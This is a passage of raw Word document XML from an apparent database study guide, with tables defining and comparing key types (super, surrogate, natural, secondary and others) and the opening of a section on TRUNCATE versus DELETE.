          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12AE648D" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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6. Alternate Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="475423AE" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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didate keys not chosen as the primary key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="3431471E" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7913F1BD" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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7. Super Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D2DE184" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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ny set of columns that can uniquely identify a row (may include extra columns).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="0050AD7F" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61820C48" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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8. Natural Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="551E23CF" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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key that has a real-world meaning (like SSN, email, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="778417A5" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="321C86D4" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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9. Surrogate Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B6D3482" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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 system-generated key (like auto-increment ID) with no business meaning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="0E66E680" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="218C0C87" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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10. Compound Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14C96CFD" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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milar to composite key; sometimes used interchangeably. Combination of fields used as a key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="09C8A606" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CA58602" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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11. Artificial Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1512B579" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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n-made key when no natural key exists; often surrogate key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="1C1D0E05" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7195D718" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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12. Secondary Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C69A649" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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on-primary keys used for indexing and searching records.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52ADE29D" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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CCBD11A">
          <v:rect id="_x0000_i2944" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB775A"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ummary Table:</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436"/>
        <w:gridCol w:w="1127"/>
        <w:gridCol w:w="823"/>
        <w:gridCol w:w="1704"/>
        <w:gridCol w:w="1809"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="1449983C" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="457E9B20"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Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2511F5F7"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Uniqueness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D15C851"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Nullable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07B29F20"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Business Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8F3DFA" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74E18" w:rsidP="00E74E1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Primary Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="63B878C4" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6661E54D"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imary Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54A69AF4"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169376A2"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323ADF39"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1792544B"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r>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="4E2D2699" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36FDE7E5"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nique Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45B61D39"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768BF629"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726F76A8"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3927FD4C"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r>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="1161B9CA" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="352E9B31"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eign Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="580477F2"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3E7A7441"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7ACAA652"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4B5B8748"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r>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="19FFB598" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D212BAF"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site Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C95C658"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08E6FBDC"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2058CAE4"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096C4780"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r>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="10FB5ADC" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01E655A0"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andidate Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C6F8096"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5CA4F3CD"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3F29F33D"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="476536FD"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 xml:space="preserve"> (unless chosen)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="211965A9" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D96053"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lternate Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F50FEAF"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714751B1"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5815F680"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D9E686F"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r>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="39BA5577" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="665DB71E"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per Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3446F8FA"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21CA6B0F"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6D79E8ED"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E9BB10"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r>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="3A0F5978" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C6D8B6D"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atural Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="518A9C3A"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4D984FC9"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6739AF61"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2B0A0284"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="65744AAF" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79E8306C"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urrogate Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B96ABA6"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3E43E86E"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4E3897BB"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6C21BD9E"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="621DBD05" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3962182E"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ound Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0346792D"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41A36C5E"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358134C2"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D1C274"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="022AFFEF" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29E963B3"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rtificial Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A29FAB"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6ED4548F"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62BCF273"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05AE1367"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="7CC66950" w14:textId="77777777" w:rsidTr="00E74E18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A91910"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condary Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60335F38"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2DD8C11C"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F7519DF"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r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A6E83E2" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74E18" w:rsidP="00E74E18">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62C317C6" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRDefault="00000000" w:rsidP="00E74E1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219C79">
          <v:rect id="_x0000_i2945" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B729D" w14:textId="32C44734" w:rsidR="000938AB" w:rsidRPr="00CE4B95" w:rsidRDefault="000938AB" w:rsidP="000938AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000938AB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Truncate and Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D3ECC" w14:textId="5890D2CC" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="007726F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> TRUNCATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CECF56" w14:textId="63538BC4" w:rsidR="00F815A9" w:rsidRPr="005615E8" w:rsidRDefault="00F815A9" w:rsidP="005615E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005615E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Removes all rows from a table instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4C4B2" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cannot be rolled back (in most RDBMS, unless inside a transaction in some).</w:t>
      </w:r>
    </w:p>
